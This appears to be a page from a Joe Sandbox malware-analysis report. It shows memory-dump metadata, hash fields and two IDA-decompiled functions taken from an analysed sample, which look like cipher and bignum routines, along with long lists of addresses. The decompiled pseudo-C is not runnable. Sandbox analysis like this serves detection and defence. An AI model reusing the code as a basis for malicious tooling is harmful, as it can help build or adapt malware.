                                                                                                                            0x25bf8a88324
                                                                                                                            0x25bf8a88342
                                                                                                                            0x25bf8a88360
                                                                                                                            0x25bf8a8837e
                                                                                                                            0x25bf8a88399
                                                                                                                            0x25bf8a883a4

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0cf1303b3d3e9358c47f761ee998a4d7d5b97797fb10bb526303a2194177b4b1
                                                                                                                            • Instruction ID: 045150c39ebc9c037c80409270430a778929e22f70f1c40cd2c7a47bd3de3496
                                                                                                                            • Opcode Fuzzy Hash: 0cf1303b3d3e9358c47f761ee998a4d7d5b97797fb10bb526303a2194177b4b1
                                                                                                                            • Instruction Fuzzy Hash: 495244722189418BDB08CB1CE8A173AB7A1F3C9B81F444529E79B8BB99CB3CD550CB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A87060 Relevance: .6, Instructions: 592COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A87060(void* __edi, void* __esp, long long __rcx, long long __rdx, long long __r8, signed long long _a4, long long _a8, signed long long _a12, long long _a16, long long _a24) {
				signed long long _v4;
				signed int _v24;
				signed int _v28;
				signed long long _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				unsigned int _v60;
				unsigned int _v64;
				signed long long _t706;
				signed long long _t707;
				signed long long _t708;
				signed long long _t709;
				signed long long _t710;
				signed long long _t711;
				signed long long _t712;
				signed long long _t713;
				signed long long _t714;
				signed long long _t716;
				signed long long _t719;
				signed long long _t720;
				signed long long _t724;
				signed long long _t725;
				signed long long _t729;
				signed long long _t730;
				signed long long _t734;
				signed long long _t735;
				signed long long _t791;
				signed long long _t794;
				signed long long _t797;
				signed long long _t800;
				signed long long _t803;
				signed long long _t806;
				signed long long _t809;
				signed long long _t812;
				signed long long _t815;
				signed long long _t822;
				signed long long _t829;
				signed long long _t836;
				void* _t845;
				signed int* _t846;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_t846 = _t845 - 0x30;
				memset(__edi, 0xcccccccc, 0xc << 2);
				_v28 =  *((intOrPtr*)(_a12 + 0x1e0));
				_t706 = _a12;
				_v36 = _t706;
				_t707 = _t706 * 0;
				_t719 = _v4;
				_t720 = _t719;
				 *_t846 = ( *(_t719 + _t707) & 0xff) << 0x00000018 | ( *(_v4 + _t720) & 0xff) << 0x00000010 | ( *(_v4 + _t720 * 2) & 0xff) << 0x00000008 |  *(_v4 + _t720 * 2 * 3) & 0xff;
				_t708 = _t707 * 0;
				 *_t846 =  *_t846 ^  *(_v36 + _t708);
				_t709 = _t708 * 0;
				_t724 = _v4;
				_t725 = _t724;
				_v64 = ( *(_t724 + _t709 + 4) & 0xff) << 0x00000018 | ( *(_v4 + _t725 + 4) & 0xff) << 0x00000010 | ( *(_v4 + 4 + _t725 * 2) & 0xff) << 0x00000008 |  *(_v4 + 4 + _t725 * 2 * 3) & 0xff;
				_t710 = _t709;
				_v64 = _v64 ^  *(_v36 + _t710);
				_t711 = _t710 * 0;
				_t729 = _v4;
				_t730 = _t729;
				_v60 = ( *(_t729 + _t711 + 8) & 0xff) << 0x00000018 | ( *(_v4 + _t730 + 8) & 0xff) << 0x00000010 | ( *(_v4 + 8 + _t730 * 2) & 0xff) << 0x00000008 |  *(_v4 + 8 + _t730 * 2 * 3) & 0xff;
				_t712 = _t711 * 2;
				_v60 = _v60 ^  *(_v36 + _t712);
				_t713 = _t712 * 0;
				_t734 = _v4;
				_t735 = _t734;
				_t736 = _t735 * 2;
				_t791 = _v4;
				_v56 = ( *(_t734 + _t713 + 0xc) & 0xff) << 0x00000018 | ( *(_v4 + _t735 + 0xc) & 0xff) << 0x00000010 | ( *(_v4 + 0xc + _t735 * 2) & 0xff) << 0x00000008 |  *(_t791 + 0xc + _t736 * 3) & 0xff;
				_t714 = _t713 * 3;
				_v56 = _v56 ^  *(_v36 + _t714);
				_v24 = _v28 >> 1;
				_t794 = _v36;
				_v52 =  *(0xf8a91fa0 + _t714 * 4) ^  *(0xf8a92fa0 + _t791 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t794 + 0x96fe2a47e80);
				_t797 = _v36;
				_v48 =  *(0xf8a91fa0 + _t714 * 4) ^  *(0xf8a92fa0 + _t794 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t797 + 0xbcbdb4d9e20);
				_t800 = _v36;
				_v44 =  *(0xf8a91fa0 + _t714 * 4) ^  *(0xf8a92fa0 + _t797 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t800 + 0xe27d3f6bdc0);
				_t803 = _v36;
				_v40 =  *(0xf8a91fa0 + _t714 * 4) ^  *(0xf8a92fa0 + _t800 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t803 + 0x1083cc9fdd60);
				_t716 = _v36 + 0x20;
				_v36 = _t716;
				_v24 = _v24 - 1;
				if (_v24 != 0) goto 0xf8a874b0;
				goto 0xf8a87654;
				_t806 = _v36;
				 *_t846 =  *(0xf8a91fa0 + _t716 * 4) ^  *(0xf8a92fa0 + _t803 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *_t806;
				_t809 = _v36;
				_v64 =  *(0xf8a91fa0 + _t716 * 4) ^  *(0xf8a92fa0 + _t806 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t809 + 0x25bf8a91fa0);
				_t812 = _v36;
				_v60 =  *(0xf8a91fa0 + _t716 * 4) ^  *(0xf8a92fa0 + _t809 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t812 + 0x4b7f1523f40);
				_t815 = _v36;
				_v56 =  *(0xf8a91fa0 + _t716 * 4) ^  *(0xf8a92fa0 + _t812 * 4) ^  *0xBCBDB4DB220 ^  *0xBCBDB4DB620 ^  *(_t815 + 0x713e9fb5ee0);
				goto 0xf8a872f0;
				 *_t846 =  *(0xf8a947a0 + _t716 * 4) ^  *(0xf8a943a0 + _t815 * 4) ^  *0xBCBDB4E5E20 ^  *0xBCBDB4E5A20 ^  *(_v36 + 0xf8a947a0);
				 *((char*)(_a4 + 0xf8a947a0)) =  *_t846 >> 0x00000018 & 0x000000ff;
				 *((char*)(_a4 + 0xf8a947a0)) =  *_t846 >> 0x00000010 & 0x000000ff;
				 *((char*)(_a4 + 0xf8a947a0)) =  *_t846 >> 0x00000008 & 0x000000ff;
				_t822 = _a4;
				 *_t822 =  *_t846 & 0x000000ff;
				_v64 =  *(0xf8a947a0 + _t716 * 4) ^  *(0xf8a943a0 + _t822 * 4) ^  *0xBCBDB4E5E20 ^  *0xBCBDB4E5A20 ^  *(_v36 + 0xf8a947a0);
				 *((char*)(_a4 + 0x25bf8a947a4)) = _v64 >> 0x00000018 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a947a4)) = _v64 >> 0x00000010 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a947a4)) = _v64 >> 0x00000008 & 0x000000ff;
				_t829 = _a4;
				 *((char*)(_t829 + 4)) = _v64 & 0x000000ff;
				_v60 =  *(0xf8a947a0 + _t716 * 4) ^  *(0xf8a943a0 + _t829 * 4) ^  *0xBCBDB4E5E20 ^  *0xBCBDB4E5A20 ^  *(_v36 + 0xf8a947a0);
				 *((char*)(_a4 + 0x25bf8a947a8)) = _v60 >> 0x00000018 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a947a8)) = _v60 >> 0x00000010 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a947a8)) = _v60 >> 0x00000008 & 0x000000ff;
				_t836 = _a4;
				 *((char*)(_t836 + 8)) = _v60 & 0x000000ff;
				_v56 =  *(0xf8a947a0 + _t716 * 4) ^  *(0xf8a943a0 + _t836 * 4) ^  *0xBCBDB4E5E20 ^  *0xBCBDB4E5A20 ^  *(_v36 + 0xf8a947a0);
				 *((char*)(_a4 + 0x25bf8a947ac)) = _v56 >> 0x00000018 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a947ac)) = _v56 >> 0x00000010 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a947ac)) = _v56 >> 0x00000008 & 0x000000ff;
				 *((char*)(_a4 + 0xc)) = _v56 & 0x000000ff;
				return 0;
			}














































                                                                                                                            0x25bf8a87060
                                                                                                                            0x25bf8a87065
                                                                                                                            0x25bf8a8706a
                                                                                                                            0x25bf8a87070
                                                                                                                            0x25bf8a87081
                                                                                                                            0x25bf8a87093
                                                                                                                            0x25bf8a87097
                                                                                                                            0x25bf8a8709c
                                                                                                                            0x25bf8a870a6
                                                                                                                            0x25bf8a870aa
                                                                                                                            0x25bf8a870c0
                                                                                                                            0x25bf8a8710f
                                                                                                                            0x25bf8a87117
                                                                                                                            0x25bf8a8712a
                                                                                                                            0x25bf8a87132
                                                                                                                            0x25bf8a87136
                                                                                                                            0x25bf8a8714d
                                                                                                                            0x25bf8a8719f
                                                                                                                            0x25bf8a871a8
                                                                                                                            0x25bf8a871bc
                                                                                                                            0x25bf8a871c5
                                                                                                                            0x25bf8a871c9
                                                                                                                            0x25bf8a871e0
                                                                                                                            0x25bf8a87232
                                                                                                                            0x25bf8a8723b
                                                                                                                            0x25bf8a8724f
                                                                                                                            0x25bf8a87258
                                                                                                                            0x25bf8a8725c
                                                                                                                            0x25bf8a87273
                                                                                                                            0x25bf8a87291
                                                                                                                            0x25bf8a872b3
                                                                                                                            0x25bf8a872c5
                                                                                                                            0x25bf8a872ce
                                                                                                                            0x25bf8a872e2
                                                                                                                            0x25bf8a872ec
                                                                                                                            0x25bf8a8734b
                                                                                                                            0x25bf8a87353
                                                                                                                            0x25bf8a873b2
                                                                                                                            0x25bf8a873ba
                                                                                                                            0x25bf8a87419
                                                                                                                            0x25bf8a87421
                                                                                                                            0x25bf8a87480
                                                                                                                            0x25bf8a87488
                                                                                                                            0x25bf8a87491
                                                                                                                            0x25bf8a87495
                                                                                                                            0x25bf8a874a0
                                                                                                                            0x25bf8a874a9
                                                                                                                            0x25bf8a874ab
                                                                                                                            0x25bf8a8750c
                                                                                                                            0x25bf8a87514
                                                                                                                            0x25bf8a87573
                                                                                                                            0x25bf8a8757b
                                                                                                                            0x25bf8a875db
                                                                                                                            0x25bf8a875e3
                                                                                                                            0x25bf8a87643
                                                                                                                            0x25bf8a8764b
                                                                                                                            0x25bf8a8764f
                                                                                                                            0x25bf8a876b8
                                                                                                                            0x25bf8a876d4
                                                                                                                            0x25bf8a876f0
                                                                                                                            0x25bf8a8770c
                                                                                                                            0x25bf8a87720
                                                                                                                            0x25bf8a87725
                                                                                                                            0x25bf8a8778c
                                                                                                                            0x25bf8a877aa
                                                                                                                            0x25bf8a877c8
                                                                                                                            0x25bf8a877e6
                                                                                                                            0x25bf8a877fc
                                                                                                                            0x25bf8a87801
                                                                                                                            0x25bf8a87869
                                                                                                                            0x25bf8a87887
                                                                                                                            0x25bf8a878a5
                                                                                                                            0x25bf8a878c3
                                                                                                                            0x25bf8a878d9
                                                                                                                            0x25bf8a878de
                                                                                                                            0x25bf8a87946
                                                                                                                            0x25bf8a87964
                                                                                                                            0x25bf8a87982
                                                                                                                            0x25bf8a879a0
                                                                                                                            0x25bf8a879bb
                                                                                                                            0x25bf8a879c6

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e159a6cc57e26d344b09782dae72ac89cbff88d6f40c27d95e82b3f629b8c26
                                                                                                                            • Instruction ID: 023e1ea5f4846761320b79e4c670cafaf479b0edb002de75bde2b01a06bfe0cc
                                                                                                                            • Opcode Fuzzy Hash: 5e159a6cc57e26d344b09782dae72ac89cbff88d6f40c27d95e82b3f629b8c26
                                                                                                                            • Instruction Fuzzy Hash: BF5256B32189808BDB08CB1DE4A573AB7A1F3C9780F54852AF79A87799CB3CD554CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A69680 Relevance: .4, Instructions: 404COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 59%
                                                                                                                            			E0000025B25BF8A69680(void* __ecx, void* __edx, void* __eflags, void* __rax, long long __rcx, long long __rdx, signed int __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t135;
				void* _t137;
				void* _t139;
				void* _t141;
				void* _t146;
				signed int _t169;
				void* _t175;
				signed int _t179;
				signed int _t213;
				signed int _t218;
				signed int _t232;
				void* _t240;
				void* _t256;
				void* _t271;
				void* _t297;
				signed long long _t300;
				signed long long _t301;
				signed long long _t311;
				void* _t313;
				intOrPtr _t335;
				signed long long _t367;
				void* _t383;
				void* _t385;
				void* _t386;
				intOrPtr _t391;
				void* _t393;
				void* _t394;
				signed long long _t395;
				void* _t407;
				intOrPtr* _t408;
				signed int _t410;
				long long* _t415;
				void* _t416;

				_t406 = __r10;
				_t393 = _t394 - 0x1788;
				E0000025B25BF8A7A9C0(0x1888, __rax, __r10, _t407);
				_t395 = _t394 - __rax;
				_t300 =  *0xf8a9c990; // 0x18002eb3c
				_t301 = _t300 ^ _t395;
				 *(_t393 + 0x1770) = _t301;
				 *((long long*)(_t395 + 0x28)) = __rcx;
				 *((long long*)(_t395 + 0x60)) = __r9;
				_t410 = __r8;
				 *((long long*)(_t395 + 0x58)) = __rdx;
				_t135 = E0000025B25BF8A66C64(__rdx);
				if (_t135 - 7 > 0) goto 0xf8a696dc;
				goto 0xf8a69720;
				if (_t135 - 0x24 > 0) goto 0xf8a696e8;
				goto 0xf8a69720;
				if (_t135 - 0x8c > 0) goto 0xf8a696f6;
				goto 0xf8a69720;
				if (_t135 - 0x1c2 > 0) goto 0xf8a69704;
				goto 0xf8a69720;
				if (_t135 - 0x517 > 0) goto 0xf8a69712;
				goto 0xf8a69720;
				dil = _t135 - 0xdc9 > 0;
				if (E0000025B25BF8A666B8(_t301, _t393 - 0x78, __rdx) != 0) goto 0xf8a69bf7;
				_t7 = _t383 - 1; // 0x5
				_t8 = _t301 + 1; // 0x1
				r14d = _t8;
				_t9 = _t301 + 1; // 0x1
				r15d = _t9;
				r14d = r14d << _t7;
				r15d = r15d << 7;
				_t179 = r14d;
				if (r14d - r15d >= 0) goto 0xf8a69773;
				_t137 = E0000025B25BF8A666B8(_t395 + 0x70, _t395 + 0x70 + (_t179 + _t179 * 2) * 8, __rdx);
				if (_t137 != 0) goto 0xf8a697b7;
				if (_t179 + 1 - r15d < 0) goto 0xf8a6974c;
				_t391 =  *((intOrPtr*)(_t395 + 0x28));
				if ( *((intOrPtr*)(_t393 + 0x17f0)) != 0) goto 0xf8a697f9;
				_t139 = E0000025B25BF8A66A00(__r8, _t395 + 0x20);
				if (_t139 != 0) goto 0xf8a69bc0;
				_t207 =  *__r8;
				if (1 + __r8 * 2 - 0x200 >= 0) goto 0xf8a697f0;
				if ( *__r8 - 0x100 >= 0) goto 0xf8a697f0;
				goto 0xf8a69822;
				_t256 = r14d - _t139;
				if (_t256 >= 0) goto 0xf8a697e0;
				_t385 = _t395 + 0x70 + (r14d + r14d * 2) * 8;
				_t141 = E0000025B25BF8A67578(1 + __r8 * 2, _t385, _t395 + 0x20);
				_t386 = _t385 + 0x18;
				_t314 = _t313 - 1;
				if (_t256 != 0) goto 0xf8a697cf;
				E0000025B25BF8A67578(_t141, _t393 - 0x78, _t395 + 0x20);
				goto 0xf8a69bf7;
				goto 0xf8a69822;
				if (_t137 != 1) goto 0xf8a6980c;
				E0000025B25BF8A6B648(_t137, _t393 - 0x78, _t395 + 0x20);
				goto 0xf8a69822;
				if (E0000025B25BF8A6B658( *__r8, _t137 - 1, r14d, _t313 - 1, _t393 - 0x78, _t395 + 0x20, _t391, _t393, _t406) != 0) goto 0xf8a69bc0;
				 *(_t395 + 0x30) = E0000025B25BF8A6B7B4;
				_t146 = E0000025B25BF8A666B8(r14d, _t395 + 0x40, _t395 + 0x20);
				if (_t146 != 0) goto 0xf8a69bc0;
				if ( *((intOrPtr*)(_t393 + 0x17f0)) != _t146) goto 0xf8a69870;
				if (E0000025B25BF8A66A64(r14d, _t313 - 1, _t395 + 0x40, _t410, _t391) != 0) goto 0xf8a69bb6;
				E0000025B25BF8A673C4(E0000025B25BF8A66A64(r14d, _t313 - 1, _t395 + 0x40, _t410, _t391), _t313 - 1, _t391, _t395 + 0x40, _t391, _t393, _t410, _t393 - 0x78);
				goto 0xf8a69889;
				E0000025B25BF8A67FD4(1, E0000025B25BF8A66A64(r14d, _t313 - 1, _t395 + 0x40, _t410, _t391), _t391);
				if (E0000025B25BF8A67AAC(_t207, 1, E0000025B25BF8A66A64(r14d, _t313 - 1, _t395 + 0x40, _t410, _t391), _t313 - 1, _t391, _t410, _t391, _t393, _t393 - 0x78) != 0) goto 0xf8a69bb6;
				 *((long long*)(_t395 + 0x28)) = _t395 + 0x70 + (r14d + r14d * 2) * 8;
				if (E0000025B25BF8A66480(_t313 - 1, _t393 - 0x78, _t395 + 0x70 + (r14d + r14d * 2) * 8) != 0) goto 0xf8a69bb6;
				_t42 = _t386 - 1; // -8
				if (_t42 <= 0) goto 0xf8a69901;
				if (E0000025B25BF8A66630( *((intOrPtr*)(_t395 + 0x28)),  *((intOrPtr*)(_t395 + 0x28)), _t393 - 0x78) != 0) goto 0xf8a69bb6;
				r8d =  *(_t395 + 0x20);
				if (E0000025B25BF8A6B7B4(_t207, _t240, E0000025B25BF8A66630( *((intOrPtr*)(_t395 + 0x28)),  *((intOrPtr*)(_t395 + 0x28)), _t393 - 0x78), _t313 - 1,  *((intOrPtr*)(_t395 + 0x28)), _t410, _t386, _t391, _t393, _t406, _t407) != 0) goto 0xf8a69bb6;
				_t46 = _t386 - 1; // -8
				if (1 - _t46 < 0) goto 0xf8a698c7;
				_t47 = _t416 + 1; // 0x2
				_t232 = _t47;
				if (_t232 - r15d >= 0) goto 0xf8a6996b;
				_t48 = _t391 - 1; // 0x1
				r13d = _t48;
				 *((long long*)(_t395 + 0x28)) = _t395 + 0x70 + (_t232 + _t232 * 2) * 8;
				if (E0000025B25BF8A6743C(_t313 - 1, _t395 + 0x70 + (r13d + r13d * 2) * 8, _t393 - 0x78, _t391, _t395 + 0x70 + (_t232 + _t232 * 2) * 8) != 0) goto 0xf8a69bb6;
				r8d =  *(_t395 + 0x20);
				_t335 =  *((intOrPtr*)(_t395 + 0x28));
				if ( *(_t395 + 0x30)() != 0) goto 0xf8a69bb6;
				r13d = r13d + 1;
				_t271 = _t232 + 1 - r15d;
				if (_t271 < 0) goto 0xf8a6990e;
				_t408 =  *((intOrPtr*)(_t395 + 0x58));
				_t415 =  *(_t395 + 0x30);
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t395 + 0x3c)) = 0;
				_t67 = _t335 + 1; // 0x1
				r10d = _t67;
				 *(_t395 + 0x24) = r8d;
				 *((long long*)(_t395 + 0x28)) =  *_t408 - 1;
				goto 0xf8a699a0;
				_t367 =  *((intOrPtr*)(_t395 + 0x28));
				r10d = r10d - 1;
				 *((intOrPtr*)(_t395 + 0x38)) = r10d;
				if (_t271 != 0) goto 0xf8a699cf;
				if (_t367 == 0xffffffff) goto 0xf8a69b04;
				r10d = 0x1c;
				r9d =  *( *((intOrPtr*)(_t408 + 0x10)) + _t367 * 4);
				 *((intOrPtr*)(_t395 + 0x38)) = r10d;
				 *((long long*)(_t395 + 0x28)) = _t367 - 1;
				r9d = r9d + r9d;
				 *(_t395 + 0x30) = r9d;
				_t218 = r9d >> 0x0000001b & 0x00000001;
				if (0 != 0) goto 0xf8a699e8;
				if (_t218 == 0) goto 0xf8a6999b;
				if (0 != 1) goto 0xf8a69a32;
				if (_t218 != 0) goto 0xf8a69a32;
				if (E0000025B25BF8A66630(_t395 + 0x40, _t395 + 0x40, _t395 + 0x70 + (_t232 + _t232 * 2) * 8) != 0) goto 0xf8a69bb6;
				r8d =  *(_t395 + 0x20);
				if ( *_t415() != 0) goto 0xf8a69bb6;
				r8d =  *(_t395 + 0x24);
				goto 0xf8a69af0;
				r8d = r8d | _t218 << 6;
				 *((intOrPtr*)(_t395 + 0x3c)) = 2;
				 *(_t395 + 0x24) = r8d;
				if (1 != 7) goto 0xf8a699a0;
				if (7 <= 0) goto 0xf8a69a9c;
				if (E0000025B25BF8A66630(_t395 + 0x40, _t395 + 0x40, _t395 + 0x70 + (_t232 + _t232 * 2) * 8) != 0) goto 0xf8a69bb6;
				r8d =  *(_t395 + 0x20);
				if ( *_t415() != 0) goto 0xf8a69bb6;
				if (1 - 7 < 0) goto 0xf8a69a5e;
				r8d =  *(_t395 + 0x24);
				_t311 = r8d;
				if (E0000025B25BF8A6743C(_t314, _t395 + 0x40, _t395 + 0x70 + (_t311 + _t311 * 2) * 8, _t391, _t395 + 0x40) != 0) goto 0xf8a69bb6;
				r8d =  *(_t395 + 0x20);
				if ( *_t415() != 0) goto 0xf8a69bb6;
				_t101 = _t311 + 1; // 0x1
				_t213 = _t101;
				r8d = 0;
				 *((intOrPtr*)(_t395 + 0x3c)) = _t213;
				 *(_t395 + 0x24) = r8d;
				r9d =  *(_t395 + 0x30);
				r10d =  *((intOrPtr*)(_t395 + 0x38));
				goto 0xf8a6999b;
				if (_t213 != 2) goto 0xf8a69b86;
				if (0 <= 0) goto 0xf8a69b86;
				if (0 <= 0) goto 0xf8a69b86;
				if (E0000025B25BF8A66630(_t395 + 0x40, _t395 + 0x40, _t395 + 0x40) != 0) goto 0xf8a69bb6;
				r8d =  *(_t395 + 0x20);
				if ( *_t415() != 0) goto 0xf8a69bb6;
				_t169 =  *(_t395 + 0x24) +  *(_t395 + 0x24);
				 *(_t395 + 0x24) = _t169;
				if ((_t169 & r15d) == 0) goto 0xf8a69b80;
				if (E0000025B25BF8A6743C(_t314, _t395 + 0x40, _t393 - 0x78, _t391, _t395 + 0x40) != 0) goto 0xf8a69bb6;
				r8d =  *(_t395 + 0x20);
				if ( *_t415() != 0) goto 0xf8a69bb6;
				if (1 < 0) goto 0xf8a69b13;
				if ( *((intOrPtr*)(_t393 + 0x17f0)) != 0) goto 0xf8a69ba5;
				r8d =  *(_t395 + 0x20);
				if ( *_t415() != 0) goto 0xf8a69bb6;
				_t175 = E0000025B25BF8A67578(E0000025B25BF8A67578(E0000025B25BF8A69038(_t172, _t395 + 0x40,  *((intOrPtr*)(_t395 + 0x60))), _t395 + 0x40,  *((intOrPtr*)(_t395 + 0x60))), _t393 - 0x78,  *((intOrPtr*)(_t395 + 0x60)));
				_t297 = r14d - r15d;
				if (_t297 >= 0) goto 0xf8a69bf5;
				r15d = r15d - r14d;
				E0000025B25BF8A67578(_t175, _t395 + 0x70 + (r14d + r14d * 2) * 8,  *((intOrPtr*)(_t395 + 0x60)));
				if (_t297 != 0) goto 0xf8a69be4;
				return E0000025B25BF8A81A50(_t213, _t314,  *(_t393 + 0x1770) ^ _t395,  *((intOrPtr*)(_t395 + 0x60)), _t395 + 0x70 + (r14d + r14d * 2) * 8 + 0x18, _t391 - 1, _t393, _t410);
			}









































                                                                                                                            0x25bf8a69680
                                                                                                                            0x25bf8a6968d
                                                                                                                            0x25bf8a6969a
                                                                                                                            0x25bf8a6969f
                                                                                                                            0x25bf8a696a2
                                                                                                                            0x25bf8a696a9
                                                                                                                            0x25bf8a696ac
                                                                                                                            0x25bf8a696b6
                                                                                                                            0x25bf8a696be
                                                                                                                            0x25bf8a696c3
                                                                                                                            0x25bf8a696c6
                                                                                                                            0x25bf8a696cb
                                                                                                                            0x25bf8a696d3
                                                                                                                            0x25bf8a696da
                                                                                                                            0x25bf8a696df
                                                                                                                            0x25bf8a696e6
                                                                                                                            0x25bf8a696ed
                                                                                                                            0x25bf8a696f4
                                                                                                                            0x25bf8a696fb
                                                                                                                            0x25bf8a69702
                                                                                                                            0x25bf8a69709
                                                                                                                            0x25bf8a69710
                                                                                                                            0x25bf8a69719
                                                                                                                            0x25bf8a6972b
                                                                                                                            0x25bf8a69731
                                                                                                                            0x25bf8a69734
                                                                                                                            0x25bf8a69734
                                                                                                                            0x25bf8a69738
                                                                                                                            0x25bf8a69738
                                                                                                                            0x25bf8a6973c
                                                                                                                            0x25bf8a69741
                                                                                                                            0x25bf8a69744
                                                                                                                            0x25bf8a6974a
                                                                                                                            0x25bf8a6975c
                                                                                                                            0x25bf8a69765
                                                                                                                            0x25bf8a6976c
                                                                                                                            0x25bf8a6976e
                                                                                                                            0x25bf8a69783
                                                                                                                            0x25bf8a69785
                                                                                                                            0x25bf8a6978e
                                                                                                                            0x25bf8a69794
                                                                                                                            0x25bf8a697a4
                                                                                                                            0x25bf8a697ac
                                                                                                                            0x25bf8a697b5
                                                                                                                            0x25bf8a697b7
                                                                                                                            0x25bf8a697ba
                                                                                                                            0x25bf8a697cb
                                                                                                                            0x25bf8a697d2
                                                                                                                            0x25bf8a697d7
                                                                                                                            0x25bf8a697db
                                                                                                                            0x25bf8a697de
                                                                                                                            0x25bf8a697e4
                                                                                                                            0x25bf8a697eb
                                                                                                                            0x25bf8a697f7
                                                                                                                            0x25bf8a697fc
                                                                                                                            0x25bf8a697fe
                                                                                                                            0x25bf8a6980a
                                                                                                                            0x25bf8a69815
                                                                                                                            0x25bf8a69827
                                                                                                                            0x25bf8a6982c
                                                                                                                            0x25bf8a69835
                                                                                                                            0x25bf8a69846
                                                                                                                            0x25bf8a69854
                                                                                                                            0x25bf8a69869
                                                                                                                            0x25bf8a6986e
                                                                                                                            0x25bf8a69875
                                                                                                                            0x25bf8a6988d
                                                                                                                            0x25bf8a698aa
                                                                                                                            0x25bf8a698b8
                                                                                                                            0x25bf8a698be
                                                                                                                            0x25bf8a698c5
                                                                                                                            0x25bf8a698d8
                                                                                                                            0x25bf8a698de
                                                                                                                            0x25bf8a698f2
                                                                                                                            0x25bf8a698f8
                                                                                                                            0x25bf8a698ff
                                                                                                                            0x25bf8a69901
                                                                                                                            0x25bf8a69901
                                                                                                                            0x25bf8a69908
                                                                                                                            0x25bf8a6990a
                                                                                                                            0x25bf8a6990a
                                                                                                                            0x25bf8a69932
                                                                                                                            0x25bf8a69940
                                                                                                                            0x25bf8a69946
                                                                                                                            0x25bf8a6994b
                                                                                                                            0x25bf8a6995b
                                                                                                                            0x25bf8a69963
                                                                                                                            0x25bf8a69966
                                                                                                                            0x25bf8a69969
                                                                                                                            0x25bf8a6996b
                                                                                                                            0x25bf8a69970
                                                                                                                            0x25bf8a6997a
                                                                                                                            0x25bf8a69981
                                                                                                                            0x25bf8a69984
                                                                                                                            0x25bf8a6998b
                                                                                                                            0x25bf8a6998b
                                                                                                                            0x25bf8a6998f
                                                                                                                            0x25bf8a69994
                                                                                                                            0x25bf8a69999
                                                                                                                            0x25bf8a6999b
                                                                                                                            0x25bf8a699a0
                                                                                                                            0x25bf8a699a3
                                                                                                                            0x25bf8a699a8
                                                                                                                            0x25bf8a699ae
                                                                                                                            0x25bf8a699b8
                                                                                                                            0x25bf8a699be
                                                                                                                            0x25bf8a699c5
                                                                                                                            0x25bf8a699ca
                                                                                                                            0x25bf8a699d2
                                                                                                                            0x25bf8a699d8
                                                                                                                            0x25bf8a699dd
                                                                                                                            0x25bf8a699e2
                                                                                                                            0x25bf8a699e6
                                                                                                                            0x25bf8a699eb
                                                                                                                            0x25bf8a699ef
                                                                                                                            0x25bf8a69a04
                                                                                                                            0x25bf8a69a0a
                                                                                                                            0x25bf8a69a1e
                                                                                                                            0x25bf8a69a28
                                                                                                                            0x25bf8a69a2d
                                                                                                                            0x25bf8a69a3f
                                                                                                                            0x25bf8a69a47
                                                                                                                            0x25bf8a69a4b
                                                                                                                            0x25bf8a69a52
                                                                                                                            0x25bf8a69a5c
                                                                                                                            0x25bf8a69a71
                                                                                                                            0x25bf8a69a77
                                                                                                                            0x25bf8a69a8b
                                                                                                                            0x25bf8a69a95
                                                                                                                            0x25bf8a69a97
                                                                                                                            0x25bf8a69a9c
                                                                                                                            0x25bf8a69abf
                                                                                                                            0x25bf8a69ac5
                                                                                                                            0x25bf8a69ad9
                                                                                                                            0x25bf8a69adf
                                                                                                                            0x25bf8a69adf
                                                                                                                            0x25bf8a69ae4
                                                                                                                            0x25bf8a69ae7
                                                                                                                            0x25bf8a69aeb
                                                                                                                            0x25bf8a69af0
                                                                                                                            0x25bf8a69af5
                                                                                                                            0x25bf8a69aff
                                                                                                                            0x25bf8a69b07
                                                                                                                            0x25bf8a69b0b
                                                                                                                            0x25bf8a69b11
                                                                                                                            0x25bf8a69b26
                                                                                                                            0x25bf8a69b2c
                                                                                                                            0x25bf8a69b40
                                                                                                                            0x25bf8a69b46
                                                                                                                            0x25bf8a69b48
                                                                                                                            0x25bf8a69b4f
                                                                                                                            0x25bf8a69b68
